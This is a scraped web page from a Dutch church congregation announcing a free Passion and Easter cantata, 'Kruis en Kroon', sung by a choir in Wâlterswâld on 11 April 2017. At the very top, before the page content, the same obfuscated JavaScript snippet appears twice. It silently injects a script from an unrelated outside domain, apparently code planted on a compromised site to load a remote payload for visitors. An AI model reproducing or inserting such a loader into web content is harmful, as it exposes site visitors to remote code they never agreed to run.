;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kruis en Kroon - PKN Damwâld
11 april 2017
19:30 t/m 20:15
Kruis en KroonCantate voor Passie en Pasen

In de stille week kunt u in Wâlterswâld genieten van een korte cantate voor passie en Pasen met als titel “Kruis en Kroon’. In deze cantate wisselen koor, orgel, spreekstem en enkele, in samenzang gezongen, koralen elkaar af. Aan de hand van de verteller volgen we in grote lijnen het verhaal van Jezus’ lijden dat uitmondt in het eeuwige leven.
Deze prachtige, recent hertaalde, cantate van Herman de Wolff, wordt gezongen door christelijk gemengd koor ‘Looft den Heer’ Wijnjewoude, onder de bezielende leiding van dirigent Annejaap Soldaat. Aan het orgel het 19-jarig talent Jaap de Kok uit Diever. De spreekstem is van Oeds van der Mei.

De uitvoering op dinsdag 11 april en duurt circa 45 minuten en begint om 19.30 uur. Gereformeerde kerk vrijgemaakt ‘de Lichtbron’ Wâlterswâld, Tsjerkeloane 12.
Gratis entree. Collecte bij de uitgang.